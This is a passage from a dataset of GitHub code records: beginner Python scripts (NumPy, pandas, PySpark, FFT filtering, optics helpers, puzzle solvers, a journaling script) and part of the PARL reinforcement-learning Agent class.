result\n","repo_name":"cedric-demongivert/gl-tool-math","sub_path":"generation/src/random_vector.py","file_name":"random_vector.py","file_ext":"py","file_size_in_byte":534,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"22147007904","text":"import numpy as np\n\narr = np.array([1, 3, 5, 7])\n\nx = np.searchsorted(arr, [2, 4, 6])\n\nprint(x)\n\n\n\n\n# Multiple Values\n# To search for more than one value, use an array with the specified values.\n\n# Example\n# Find the indexes where the values 2, 4, and 6 should be inserted:\n\n\n\n# The return value is an array: [1 2 3] containing the three indexes where 2, 4, 6 would be inserted in the original array to maintain the order.\n","repo_name":"StumbledUponCS/10_Python_Examples","sub_path":"Python Examples/02) NumPy Intro/index172.py","file_name":"index172.py","file_ext":"py","file_size_in_byte":423,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"25776912813","text":"import random\ngame_action = ['Rock', 'Paper', 'Scissors']# These are the valid actions for this game.\n# a score-board to keep the score of both players.\nPlayer1_score = 0\nPlayer2_score = 0\nbreak_out = True\nwhile break_out:\n try:\n #Asks the player for the number of rounds.\n #input must be of only integer types greater than zero.\n rounds = int(input('How many rounds will you like to play? '))\n assert rounds > 0, print('invalid value for rounds')\n #Handles a possible error that might occur incase an invalid number is entered by the player.\n except:\n print('invalid value for rounds')\n continue\n else:\n #repeats the game for x number of times the user has entered in rounds\n for i in range(rounds):\n #requests for the player's choice of game_action \n Player1_choice = input('What would you like to play Rock, Paper or Scissors? ')\n if Player1_choice not in game_action:\n print('invalid action')\n continue\n else:\n Player2_choice = random.choice(game_action)\n print(Player1_choice)\n print(Player2_choice)\n if Player1_choice == Player2_choice:\n result = 'This is a tie'\n print(result)\n print(Player1_score)\n print(Player2_score)\n elif (Player1_choice == 'Paper' and Player2_choice == 'Rock') or (Player1_choice == 'Scissors' and Player2_choice == 'Paper') or (Player1_choice == 'Rock' and Player2_choice == 'Scissors') :\n result = 'Player1 is the winner of this round'\n Player1_score += 1\n print(Player1_score)\n print(Player2_score)\n else:\n result = 'Player2 is the winner of this round'\n Player2_score += 1\n print(result)\n print(Player1_score)\n print(Player2_score)\n if Player1_score > Player2_score:\n print('\\nPlayer1 wins the game')\n elif Player2_score > Player1_score:\n print('\\nPlayer2 wins the game')\n else:\n print('\\nThe game ends in a tie')\n if rounds == 0:\n break\n break_out = False\n \n \n","repo_name":"classManc/Python-beginners-project","sub_path":"Rock_Paper_Scissors.py","file_name":"Rock_Paper_Scissors.py","file_ext":"py","file_size_in_byte":2364,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"50"} +{"seq_id":"14302723112","text":"# %% [markdown]\n# Tutorial - Data manipulation with pandas\n\n# %%\n# Set up\nimport matplotlib as mpl\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nimport numpy as np\nimport pandas as pd\npd.set_option('display.max_rows', 10) # Set max number of rows displayed\nfrom scipy.spatial.distance import pdist, squareform\nfrom scipy.cluster.hierarchy import linkage, dendrogram\nfrom pathlib import Path\n\n# %% Data Setup\n# Import iris dataset\nsns.set_style(\"white\")\niris = sns.load_dataset(\"iris\")\n\nsepal_length = iris['sepal_length']\nsepal_width = iris['sepal_width']\npetal_length = iris['petal_length']\npetal_width = iris['petal_width']\nspecies = iris['species']\n\n# %% Importing exporting data\n# Setting up path using pathlib\n## pathlib is a library specifically for manipulating strings of directories etc. Strings work most of the time, but pathlib offers greater flexibility and functionality.\ncsv_filename = Path('./iris.csv')\nexcel_filename = Path('./iris.xlsx')\n\n# Writing .csv files\n## .csv files are basic filetypes for storing data. They are the simplest to interpret and can be read by many programs. However, csv files can be slow to read and write huge datasets. For most use cases though, csv files are more than sufficient.\n## Note that to write a file, use the .to_csv() method\n## to read a file, use the pd.read_csv() function\niris.to_csv(csv_filename)\niris_csv = pd.read_csv(csv_filename)\niris_csv2 = pd.read_csv(csv_filename,index_col=0) # Ignores the index column\n\n# Writing .xlsx files\niris.to_excel(excel_filename)\niris_excel = pd.read_excel(excel_filename)\niris_excel2 = pd.read_excel(excel_filename, index_col=0) # Ignores the index column\n\n# %% Creating dataframe\n## Dataframe is to pandas what np.array is to numpy.\n## Dataframe has several methods useful for data exploration.\n\n# Create Series\nstem_length = abs(np.round(3 + 0.5 * np.random.normal(size = iris.shape[0]),1))\nstem_length_series = pd.Series(stem_length, name='stem_length')\n\n# From numpy array\niris\niris_df1 = pd.DataFrame(np.array([sepal_length, sepal_width, petal_length, petal_width, species]).T, columns=['sepal_length', 'sepal_width', 'petal_length', 'petal_width', 'species'])\n\n# From a dictionary\niris_dict = {'sepal_length': sepal_length,\n'sepal_width': sepal_width,\n'petal_length': petal_length,\n'petal_width': petal_width,\n'species': species} # Create dictionary\niris_df2 = pd.DataFrame(iris_dict)\n\n# %% Access data\n# Get column\niris\niris['species']\n\n# Get column names\niris.columns\n\n# Get row\niris.iloc[3] # Based on row location\niris.loc[3] # Based on name of index\ntype(iris.iloc[3])\n\n# Get row names\niris.index\nlist(iris.index)\n\n# Get values of a particular row and column\niris.iloc[3,0]\niris.loc[3,'sepal_length']\n\n# Get values based on conditionals\n## Check the output data type\niris['sepal_length'] < 6\nboolean_array = iris['sepal_length'] < 6\niris[boolean_array]\niris[boolean_array]['sepal_length']\n\n# Iterate rows\nfor ind, row in iris.iterrows():\n print(row[4])\n\n# %% Add data\n# Add columns\n## Note that the input is in the form of a list\niris_newcol = pd.concat([stem_length_series, iris], axis=1)\n\n# Add rows\n## Note the difference between .concat and .append\nnew_sample = pd.Series([5.2,3.5,1.6,0.3,'setosa'], index=['sepal_length', 'sepal_width', 'petal_length', 'petal_width', 'species'])\niris_newrow = pd.concat([iris, new_sample], axis=0) # Does not work\niris_newrow = iris.append(new_sample,ignore_index=True)\n\n## You can combine multiple dataframes as well\n\n# %% Manipulate data\n##\n# Creating a copy\n## A copy lets you manipulate the data without affecting the original dataset.\niris_copy1 = iris.copy()\niris_copy2 = iris.copy()\n\n# Change value\niris_copy1['species'][149]='custom1'\niris_copy1\n\niris_copy2.loc[149,'species']='custom2'\niris_copy2\n\n# Change NaN data\nnandf = pd.Series([np.nan for i in range(iris.shape[0])], name='nan_col')\niris_w_nan = pd.concat([iris,nandf], axis=1)\niris_w_nan['nan_col'].isna() #Get boolean of nan\n\niris_w_nan['nan_col'] = iris_w_nan['nan_col'].fillna(0.1)\n\n# Round data\niris.round({'sepal_length': 1, 'petal_length': 0})\n\n# Rename columns or rows\niris.rename(columns = {'sepal_length': 'SL', 'petal_length': 'PL'})\niris.rename(index={1:'One'})\n\n# Wide to long form\niris_long = pd.melt(iris, id_vars=['species'], value_vars=['sepal_length','sepal_width','petal_length','petal_width'], var_name='plant_properties', value_name='perperty_values')\niris_long\n\n# Sort by column\niris.sort_values('sepal_length')\niris.sort_values(['sepal_length','petal_length'])\n\n# %% Explore data\n# Statistics\niris.mean() # Calculate mean of all relevant columns\niris.std() # Calculate standard deviation of all relevant columns\niris['sepal_length'].var() # Calculate variance of a single column\ngmean = lambda x: np.exp(np.mean(np.log(x))) # Geometric mean\ngmean(iris['sepal_length']) # Calculate gmean of a particular column\niris_without_species = iris.iloc[:,0:-1]\niris_without_species.apply(gmean, axis=0) # Calculate gmean of columns\niris_without_species.apply(gmean, axis=1) # Calculate gmean of rows\n\n\n# Fast exploration\n## Pandas is commonly used for data exploration. .info() and .describe() are two commonly used methods to explore the data quickly.\niris.info()\niris.describe()\n\n# Groupby\n## Groupby creates groups based on categorical values of a particular column.\niris_gb = iris.groupby('species')\niris_gb.groups\niris_gb.get_group('setosa')\niris_gb['sepal_length'].mean()\niris_gb.describe()\n","repo_name":"macadology/coding-bootcamp","sub_path":"Tutorial_pandas.py","file_name":"Tutorial_pandas.py","file_ext":"py","file_size_in_byte":5433,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"13971011142","text":"pl.clf()\nnpts=1024\na=7.\nb=3.\nz=1.*np.arange(npts)/npts\nline=a+b*z\n\nc=.7\nd=.3\n\n\n\nsignal= line+np.random.random(size=npts) +c*np.cos(17.3*z) +d*np.sin(62.*z)\n \nzsignal=signal-signal.mean() # zsignal has 0 mean.\nsft=np.fft.fft(zsignal-b*(z-.5)) # sft is the signal fft\ndf=0.03\nf1=np.exp(-z**2/(2.*df**2))\nf2=np.exp(-(1.-z)**2/(2.*df**2))\nfilter=f1+f2\n\nlpsft= sft*filter # lpsft is a low-pass sft\n\nlpinv=np.fft.ifft(lpsft) # lpinv is the inv ft of lpsft\n\npl.plot(z,signal)\npl.plot(z,lpinv+signal.mean()+b*(z-.5)) # notice factor of 2!!\n\npl.plot(z,lpinv+signal.mean()+b*(z-.5),'r')\n\npl.plot(z,signal-(lpinv+signal.mean()+b*(z-.5)),'g')\n\npl.plot(z,2.*lpinv,'r') \n","repo_name":"sidhant-guliani/Thermal_test_CHIME","sub_path":"30oct-Round trip phase measurement/filter(Mark emailed).py","file_name":"filter(Mark emailed).py","file_ext":"py","file_size_in_byte":732,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"45236623018","text":"\"\"\"\nMiscellaneous functions used to analyze \nand modify optical results. \n\nGrace E. Chesmore\nMay 2021\n\"\"\"\n\nimport numpy as np\n\n\n# Phase unwrapping\ndef twodunwrapx(array):\n phase_offset = np.arange(-1000, 1000) * 2 * np.pi\n\n end_i = np.shape(array)[0] - 1\n end_j = np.shape(array)[1] - 1\n\n i = int(end_i / 2)\n while i < end_i:\n j = int(end_j / 2)\n while j < (np.shape(array))[1] - 1:\n current_val = [array[i, j]]\n next_val = array[i, j + 1] + phase_offset\n diff = np.abs(next_val - current_val)\n best = np.where(diff == np.min(diff))\n array[i, j + 1] = next_val[best][0]\n\n j += 1\n i += 1\n\n i = int(end_i / 2)\n while i > 0:\n j = int(end_j / 2)\n while j > 0:\n current_val = [array[i, j]]\n next_val = array[i, j - 1] + phase_offset\n diff = np.abs(next_val - current_val)\n best = np.where(diff == np.min(diff))\n array[i, j - 1] = next_val[best][0]\n\n j -= 1\n i -= 1\n\n i = int(end_i / 2)\n while i < end_i - 1:\n j = int(end_j / 2)\n while j > 0:\n current_val = [array[i, j]]\n next_val = array[i, j - 1] + phase_offset\n diff = np.abs(next_val - current_val)\n best = np.where(diff == np.min(diff))\n array[i, j - 1] = next_val[best][0]\n\n j -= 1\n i += 1\n\n i = int(end_i / 2)\n while i > 0:\n j = int(end_j / 2)\n while j < end_j - 1:\n current_val = [array[i, j]]\n next_val = array[i, j + 1] + phase_offset\n diff = np.abs(next_val - current_val)\n best = np.where(diff == np.min(diff))\n array[i, j + 1] = next_val[best][0]\n\n j += 1\n i -= 1\n\n return array\n\n\n# Unwraps the phase two times. The first time the phase is\n# transposed and unwrapped, then it is transposed again\n# (returned to normal state) and unwrapped.\ndef twodunwrap(array):\n xunwraped = twodunwrapx(np.transpose(array))\n unwrapped = twodunwrapx(np.transpose(xunwraped))\n return unwrapped\n\n\n# Unwraps the phase (calling on other unwrap functions) and\n# normalizes to the center of the phase measurement.\ndef do_unwrap(phi):\n unwraped_phi = twodunwrap(phi)\n # print(unwraped_phi[int(len(unwraped_phi)/2),int(len(unwraped_phi)/2)])\n # unwraped_phi = unwraped_phi - unwraped_phi[0,0]\n unwraped_phi = (\n unwraped_phi\n - unwraped_phi[int(len(unwraped_phi) / 2), int(len(unwraped_phi) / 2)]\n )\n return unwraped_phi\n\n\n# Rotate coordinates in azimuth and elevation.\ndef rotate_azel(xyz, az, el):\n\n out = np.zeros(np.shape(xyz))\n\n x = xyz[0]\n y = xyz[1]\n z = xyz[2]\n\n # Rotate in elevation (note we assume z is along the elevation direction)\n xt = np.cos(el) * x + np.sin(el) * z\n yt = y\n zt = (-1.0) * np.sin(el) * x + np.cos(el) * z\n\n # Rotate in azimuth\n out[0] = xt\n out[1] = np.cos(az) * yt + np.sin(az) * zt\n out[2] = (-1.0) * np.sin(az) * yt + np.cos(az) * zt\n\n return out\n\n\n# Given two arrays, calculate the 2D power spectrum\n# for a given ell range, pixel size, and pixel number.\ndef calculate_2d_spectrum(Map1, Map2, delta_ell, ell_max, pix_size, N):\n \"calcualtes the power spectrum of a 2d map by FFTing, squaring, and azimuthally averaging\"\n N = int(N)\n\n # Make a 2d ell coordinate system\n ones = np.ones(N)\n inds = (np.arange(N) + 0.5 - N / 2.0) / (N - 1.0)\n kY = np.outer(ones, inds) / (pix_size / 60.0 * np.pi / 180.0)\n kX = np.transpose(kY)\n K = np.sqrt(kX ** 2.0 + kY ** 2.0)\n ell_scale_factor = 2.0 * np.pi\n ell2d = K * ell_scale_factor\n\n # Make an array to hold the power spectrum results\n N_bins = int(ell_max / delta_ell)\n ell_array = np.arange(N_bins)\n CL_array = np.zeros(N_bins)\n input_maps = (np.conj(Map1) * Map1) / np.sum(abs(np.conj(Map1) * Map1))\n\n # 2d fourier transform of the map\n FMap1 = np.fft.fft2(np.fft.fftshift(input_maps))\n FMap2 = np.fft.fft2(np.fft.fftshift(input_maps))\n PSMap = np.fft.fftshift(np.real(np.conj(FMap1) * FMap2))\n\n # Fill out the spectra\n i = 0\n while i < N_bins:\n ell_array[i] = (i + 0.5) * delta_ell\n inds_in_bin = (\n (ell2d >= (i * delta_ell)) * (ell2d < ((i + 1) * delta_ell))\n ).nonzero()\n CL_array[i] = np.mean(PSMap[inds_in_bin])\n i = i + 1\n # Return the power spectrum and ell bins\n\n return (ell_array, CL_array)\n\n\n# Elevation offset of holography measurements\ndef el_offset(x):\n slope = (-0.0204345 - 0.00719988) / (400)\n return x * slope\n\n\n# Azimuth offset of holography measurements\ndef az_offset(x):\n slope = (0.01367175) / (200)\n return x * slope\n\n\n# Shifts for holography measurements\ndef sh_z(z):\n return z * ((0.33 + 0.33) / 1200)\n\n\ndef sh_x(z):\n return z * ((0.36 + 0.36) / 1200)\n\n\n# Ruze equation quantifying gain loss due\n# to surface defects on antenna.\ndef ruze(eps, lam):\n return np.exp(-2 * (4 * np.pi * eps / lam) ** 2)\n\n\n# Computes the RMS of z for a given area(x,y)\ndef rms(x, y, z):\n aperture_r = 2.75 # apodized beam radius [m]\n rr = np.where(\n ((x - np.mean(x)) ** 2 + (y - np.mean(y)) ** 2) <= aperture_r ** 2\n ) # throw out outliers\n z_rms = z[rr]\n return np.sqrt(np.sum(z_rms ** 2) / len(z_rms))\n","repo_name":"McMahonCosmologyGroup/holosim-ml","sub_path":"optics_analyze.py","file_name":"optics_analyze.py","file_ext":"py","file_size_in_byte":5352,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"50"} +{"seq_id":"4197294266","text":"import heapq\nclass Solution:\n def topKFrequent(self, nums: List[int], k: int) -> List[int]:\n if(len(nums)==0) : return output_list\n dictonary = dict()\n for i in range(0,len(nums)):\n if(nums[i] in dictonary):\n dictonary[nums[i]] += 1\n else:\n dictonary[nums[i]] = 1\n heap = [(key, value) for key, value in dictonary.items()]\n heapq.heapify(heap)\n maximum = heapq.nlargest(k,heap,key=lambda x : x[1])\n return [i[0] for i in maximum]\n \n \n ","repo_name":"PrakharKopergaonkar/LeetCode-July-Challenge","sub_path":"Week3/K_frequent.py","file_name":"K_frequent.py","file_ext":"py","file_size_in_byte":560,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"25305019593","text":"from pyspark.sql import SparkSession\nfrom pyspark.sql.functions import col\n\n# Create a SparkSession\nspark = SparkSession.builder.appName(\"WineQualityAnalysis\").getOrCreate()\n\n# Read the wine data from CSV\nwine = spark.read.format(\"csv\") \\\n .option(\"header\", True) \\\n .option(\"inferSchema\", True) \\\n .option(\"path\", \"hdfs:///lab_test/wine.csv\") \\\n .load()\n\n# Group the data by quality and count the occurrences\nquality_counts = wine.groupBy(\"quality\").count().orderBy(\"quality\")\n\n# Show the frequency of each quality rating\nquality_counts.show()\n\n# Stop the SparkSession\nspark.stop()\n","repo_name":"wanjia0523/tt","sub_path":"test5.py","file_name":"test5.py","file_ext":"py","file_size_in_byte":595,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"28036364863","text":"import re\nimport sys\nfrom dataclasses import dataclass\nimport math\n\nsys.path.append(\"c:\\\\Users\\\\james_pc\\\\projects\\\\aoc2020\\\\\")\nsys.path.append(\"./..\")\n\nfrom utils import time_algo\n\nPATH = \"day13/\"\n\n# Part 1\n\n# Class here with be ship\n#\n\n\ndef get_input(filename):\n my_file = open(filename, \"r\")\n content = my_file.readlines()\n return [line.rstrip() for line in content]\n\n\ndef parse_input(input):\n time_now = input.pop(0)\n busses = []\n\n busses_input = input\n busses_input = busses_input[0].split(\",\")\n\n for bus in busses_input:\n if bus == \"x\":\n busses.append(None)\n continue\n busses.append(Bus(bus_no=bus, period=bus, first_leave=0))\n\n return time_now, busses\n\n\ndef parse_input_v2(input):\n time_now = input.pop(0)\n busses = []\n offsets = []\n\n busses_input = input\n busses_input = busses_input[0].split(\",\")\n\n for offset in range(len(busses_input)):\n bus = busses_input[offset]\n if bus == \"x\":\n continue\n\n busses.append(Bus(bus_no=bus, period=bus, first_leave=0))\n offsets.append(offset)\n\n return busses, offsets\n\n\nclass Bus:\n def __init__(self, bus_no, period, first_leave):\n self.bus_no = int(bus_no)\n self.period = int(period)\n self.first_leave = int(first_leave)\n\n def time_to_next_bus(self, time_now):\n time_now = int(time_now)\n last_left = (time_now // self.period) * self.period\n next_leave = last_left + self.period\n\n return next_leave - time_now\n\n def __repr__(self):\n return str(self.bus_no)\n\n def leaves_now(self, time_now):\n time_now = int(time_now)\n if (time_now % self.period) == 0:\n return True\n else:\n return False\n\n\ndef part1_solve(time_now, busses):\n first_bus = None\n first_leave_time = None\n\n for bus in busses:\n leave_time = bus.time_to_next_bus(time_now)\n\n if (first_bus == None) or (first_leave_time > leave_time):\n first_bus = bus\n first_leave_time = leave_time\n\n return first_leave_time * first_bus.bus_no\n\n\ndef part2_solve(bus_order):\n # could brute force, try out numbers, see if the requirement is met\n # could do bit better, rather than loop through all number, could loop\n # through multiples of the first one\n first_bus = bus_order[0]\n first_bus_leave = 0\n\n while True:\n failure = False\n for x in range(len(bus_order)):\n if bus_order[x] is None:\n pass\n else:\n bus = bus_order[x]\n if not bus.leaves_now(first_bus_leave + x):\n # this fails\n failure = True\n break\n\n if failure:\n first_bus_leave += first_bus.period\n else:\n break\n\n return first_bus_leave\n\n\ndef part2_solve_v2(busses, offsets):\n # could we ingore the x by smarter parsing here?\n # have a list of busses, and there offset\n # also, can we increment by the largest bus number?, as I suspect that will cut down\n # time, especially if the largest bus is big\n\n # looks like this is twice as fast as part v1 only :/\n\n # get longest period\n longest_period = 0\n diff_first_bus = 0\n for x in range(len(busses)):\n bus = busses[x]\n offest = offsets[x]\n\n if bus.period > longest_period:\n longest_period = bus.period\n diff_first_bus = offest\n\n first_bus_leave = 0\n num_longest_period = 0\n\n while True:\n failure = False\n for x in range(len(busses)):\n bus = busses[x]\n offset = offsets[x]\n\n if not bus.leaves_now(first_bus_leave + offset):\n # this fails\n failure = True\n break\n\n if failure:\n num_longest_period += 1\n first_bus_leave = (num_longest_period * longest_period) - diff_first_bus\n else:\n break\n\n return first_bus_leave\n\n\ndef part2_solve_v3(busses, offsets):\n # Say we have the equations\n # T = 3x\n # Here, T=3 is a solution (here x =1)\n # We can also write this as T (mod 3) = 0\n #\n # Now if also\n # T = 1 + 4y\n # or T (mod 4) = 1\n # The previous answer T= 3 isn't solution, but if find a solution T = a * 3 where a is int\n # where this equation is satisfied, the first equation will still be satisfied\n # Timesing T by an arbitrary number 3 has no affect on T (mod 3) =0, as a*0 = 0\n #\n # Now if also:\n # T = 2 + 5z\n # T (mod 5) = 2\n # The we can iterate through T = a * 3 * 4 till we find a solution.\n # Importantly, all the other equations will still be satisfied.\n # T (mod 4) = 1 is still value, as timsing by 12 (3*4) will NOT affect modulo\n # as 12 is a multiple of 4\n #\n #\n # So loop through the busses finding a first_bus_leave time that works.\n # Use the product from the previous buses as the \"period here\".\n # So that the next solutuion we guess is current_period * a where we iterate a\n #\n # After more research, this is https://en.wikipedia.org/wiki/Chinese_remainder_theorem#Search_by_sieving\n first_bus_leave = None\n current_period = None\n\n for x in range(len(busses)):\n bus = busses[x]\n offset = offsets[x]\n\n if first_bus_leave == None:\n first_bus_leave = bus.period + offset\n current_period = bus.period\n else:\n\n while (first_bus_leave + offset) % (bus.period) != 0:\n first_bus_leave += current_period\n current_period *= bus.period\n\n return first_bus_leave\n\n\nif __name__ == \"__main__\":\n\n time_now, busses = parse_input(get_input(PATH + \"test_input\"))\n print(part2_solve(busses))\n\n busses, offsets = parse_input_v2(get_input(PATH + \"real_input\"))\n print(part2_solve_v3(busses, offsets))\n\n \"\"\"\n time_now, busses = parse_input(get_input(PATH + \"test_input_1\"))\n time_algo(part2_solve, busses)\n\n busses, offsets = parse_input_v2(get_input(PATH + \"test_input_1\"))\n time_algo(part2_solve_v2, busses, offsets)\n\n # Trying real\n busses, offsets = parse_input_v2(get_input(PATH + \"real_input\"))\n print(part2_solve_v2(busses, offsets))\n \"\"\"\n","repo_name":"semajson/aoc2020","sub_path":"day13/part2.py","file_name":"part2.py","file_ext":"py","file_size_in_byte":6247,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"6922557472","text":"# Joshua Adrian O. Daet\n# BSCpE 1-4\n# Assignment 4 - Problem 3\n\nimport random\n\ndef write():\n # open mylife.txt and put the write function to it\n try:\n with open(\"C:/assignments_oop/A4-Problem3/mylife.txt\", \"w\") as my_life:\n while True:\n # put a variable to where the user will input their lines\n line = input(\"Enter a line (press Enter to exit): \")\n\n # exit the loop if the user presses Enter\n if not line:\n break\n\n # to write a new line on the file\n my_life.write(line + \"\\n\")\n\n # ask the user if they want to enter another line\n choices = input(\"Do you want to enter another line? (y/n): \")\n\n # make a comment\n if choices == \"n\":\n print(\"\")\n comments = [\"You're doing great\", \"Great job!\", \"That was great!\", \"Impressive!\"]\n print(random.choice(comments))\n print(\"\")\n print(\"Thank you for using\")\n break\n elif choices != \"y\":\n print(\"Invalid input. Please enter 'y' or 'n'.\")\n\n # do a while loop to ask the user repeatedly\n while choices == \"y\":\n print(\"\")\n line = input(\"Enter a line: \")\n\n # to write a new line on the file\n my_life.write(line + \"\\n\")\n\n # ask again the user if they want to continue\n choices = input(\"Do you want to enter another line? (y/n): \")\n\n # comments\n if choices == \"n\":\n comments = [\"You're doing great\", \"Great job!\", \"That was great!\", \"Impressive!\"]\n print(random.choice(comments))\n break\n elif choices != \"y\":\n print(\"Invalid input. Please enter 'y' or 'n'.\")\n \n except OSError as e:\n print(f\"Error: {e}\")\n \n# call the function\nwrite()","repo_name":"jjaenim/A4-Problem3","sub_path":"Problem 3.py","file_name":"Problem 3.py","file_ext":"py","file_size_in_byte":2141,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"1683674946","text":"import warnings\nwarnings.simplefilter('default')\n\nimport os\nimport paddle\nimport paddle.fluid as fluid\nfrom parl.core.fluid import layers\nfrom parl.core.agent_base import AgentBase\nfrom parl.core.fluid.algorithm import Algorithm\nfrom parl.utils import machine_info\nfrom parl.utils import logger\n\n__all__ = ['Agent']\n\n\nclass Agent(AgentBase):\n \"\"\"\n | `alias`: ``parl.Agent``\n | `alias`: ``parl.core.fluid.agent.Agent``\n\n | Agent is one of the three basic classes of PARL.\n\n | It is responsible for interacting with the environment and collecting data for training the policy.\n | To implement a customized ``Agent``, users can:\n\n .. code-block:: python\n\n import parl\n\n class MyAgent(parl.Agent):\n def __init__(self, algorithm, act_dim):\n super(MyAgent, self).__init__(algorithm)\n self.act_dim = act_dim\n This class will initialize the neural network parameters automatically, and provides an executor for users to run the programs (self.fluid_executor).\n\n Attributes:\n fluid_executor (fluid.Executor): executor for running programs of the agent.\n alg (parl.algorithm): algorithm of this agent.\n\n Public Functions:\n - ``build_program`` (**abstract function**): build various programs for the agent to interact with outer environment.\n - ``get_weights``: return a Python dictionary containing all the parameters of self.alg.\n - ``set_weights``: copy parameters from ``set_weights()`` to this agent.\n - ``sample``: return a noisy action to perform exploration according to the policy.\n - ``predict``: return an action given current observation.\n - ``learn``: update the parameters of self.alg using the `learn_program` defined in `build_program()`.\n - ``save``: save parameters of the ``agent`` to a given path.\n - ``restore``: restore previous saved parameters from a given path.\n\n Todo:\n - allow users to get parameters of a specified model by specifying the model's name in ``get_weights()``.\n\n \"\"\"\n\n def __init__(self, algorithm):\n \"\"\"Build programs by calling the method ``self.build_program()`` and run initialization function of ``fluid.default_startup_program()``.\n\n Args:\n algorithm (parl.Algorithm): an instance of `parl.Algorithm`. This algorithm is then passed to `self.alg`.\n \"\"\"\n\n assert isinstance(algorithm, Algorithm)\n super(Agent, self).__init__(algorithm)\n\n self.gpu_id = 0 if machine_info.is_gpu_available() else -1\n\n self.build_program()\n\n if machine_info.is_xpu_available():\n self.place = fluid.XPUPlace(int(os.getenv(\"FLAGS_selected_xpus\")))\n elif machine_info.is_gpu_available():\n self.place = fluid.CUDAPlace(0)\n else:\n self.place = fluid.CPUPlace()\n self.fluid_executor = fluid.Executor(self.place)\n self.fluid_executor.run(fluid.default_startup_program())\n\n def build_program(self):\n \"\"\"Build various programs here with the\n learn, predict, sample functions of the algorithm.\n\n Note:\n | Users **must** implement this function in an ``Agent``.\n | This function will be called automatically in the initialization function.\n\n To build a program, you must do the following:\n a. Create a fluid program with ``fluid.program_guard()``;\n b. Define data layers for feeding the data;\n c. Build various programs(e.g., learn_program, predict_program) with data layers defined in step b.\n\n Example:\n\n .. code-block:: python\n\n self.pred_program = fluid.Program()\n\n with fluid.program_guard(self.pred_program):\n obs = layers.data(\n name='obs', shape=[self.obs_dim], dtype='float32')\n self.act_prob = self.alg.predict(obs)\n\n\n \"\"\"\n raise NotImplementedError\n\n def get_model_ids(self):\n \"\"\"Get all model ids of the self.alg in the agent.\n\n Returns:\n List of model_id \n \"\"\"\n return self.alg.get_model_ids()\n\n @property\n def model_ids(self):\n return self.get_model_ids()\n\n def learn(self, *args, **kwargs):\n \"\"\"The training interface for ``Agent``.\n This function feeds the training data into the learn_program defined in ``build_program()``.\n \"\"\"\n raise NotImplementedError\n\n def predict(self, *args, **kwargs):\n \"\"\"Predict an action when given the observation of the environment.\n\n This function feeds the observation into the prediction program defined in ``build_program()``. It is often used in the evaluation stage.\n \"\"\"\n raise NotImplementedError\n\n def sample(self, *args, **kwargs):\n \"\"\"Return an action with noise when given the observation of the environment.\n\n In general, this function is used in train process as noise is added to the action to preform exploration.\n\n \"\"\"\n raise NotImplementedError\n\n def save(self, save_path=None, program=None):\n \"\"\"Save parameters.\n\n Args:\n save_path(str): a directory where to save the parameters.\n program(fluid.Program): program that describes the neural network structure. If None, will all program.\n\n Raises:\n Error: if program does not exist\n\n Example:\n\n .. code-block:: python\n\n agent = AtariAgent()\n agent.save('./model_dir')\n agent.save('./model_dir', program=agent.learn_program)\n\n \"\"\"\n assert save_path is not None, 'please specify `save_path` '\n if os.path.isfile(save_path):\n raise Exception('can not save to {}, it is a file, not directory'.\n format(save_path))\n if not os.path.exists(save_path):\n os.makedirs(save_path)\n all_programs = [(key, val) for (key, val) in self.__dict__.items()\n if (isinstance(val, fluid.framework.Program)\n or isinstance(val, fluid.compiler.CompiledProgram))\n ]\n\n if program:\n filename = None\n for (name, prog) in all_programs:\n if program == prog:\n filename = name\n break\n if filename is None:\n raise Exception('can not find program {}.'.format(program))\n fluid.io.save_params(\n executor=self.fluid_executor,\n dirname=save_path,\n main_program=program,\n filename=filename)\n else:\n for (filename, program) in all_programs:\n if isinstance(program, fluid.framework.Program) or \\\n isinstance(program, fluid.compiler.CompiledProgram):\n fluid.io.save_params(\n executor=self.fluid_executor,\n dirname=save_path,\n main_program=program,\n filename=filename)\n\n def restore(self, save_path=None, program=None):\n \"\"\"Restore previously saved parameters from save_path. \n\n Args:\n save_path(str): path where parameters were previously saved.\n program(fluid.Program): program that describes the neural network structure. If None, will restore all program.\n\n Raises:\n Error: if save_path does not exist or can not find the specific program file in save_path.\n\n Example:\n\n .. code-block:: python\n\n agent = AtariAgent()\n agent.save('./model_dir')\n agent.restore('./model_dir')\n\n \"\"\"\n assert save_path is not None, 'please specify `save_path` '\n if not os.path.exists(save_path):\n raise Exception(\n 'can not restore from {}, directory does not exists'.format(\n save_path))\n if os.path.isfile(save_path):\n raise Exception(\n 'can not restore from {}, it is a file, not directory'.format(\n save_path))\n all_programs = [(key, val) for (key, val) in self.__dict__.items()\n if (isinstance(val, fluid.framework.Program)\n or isinstance(val, fluid.compiler.CompiledProgram))\n ]\n\n if program:\n filename = None\n for (name, prog) in all_programs:\n if program == prog:\n filename = name\n break\n if filename is None:\n raise Exception('can not find the program to restore.')\n if not os.path.isfile('{}/{}'.format(save_path, filename)):\n raise Exception('{}/{} does not exits'.format(\n save_path, filename))\n if type(program) is fluid.compiler.CompiledProgram:\n program = program._init_program\n fluid.io.load_params(\n executor=self.fluid_executor,\n dirname=save_path,\n main_program=program,\n filename=filename)\n else:\n programs_list = [kv[0] for kv in all_programs]\n exist_files = os.listdir(save_path)\n if len(programs_list) != len(exist_files):\n raise Exception(\n 'expected to restore {} model file under directory {}: {}, but {} files are found: {}.'\n .format(\n len(programs_list), save_path, programs_list,\n len(exist_files), exist_files))\n for (filename, program) in all_programs:\n if not os.path.isfile('{}/{}'.format(save_path, filename)):\n raise Exception('{}/{} does not exits'.format(\n save_path, filename))\n if type(program) is fluid.compiler.CompiledProgram:\n program = program._init_program\n\n 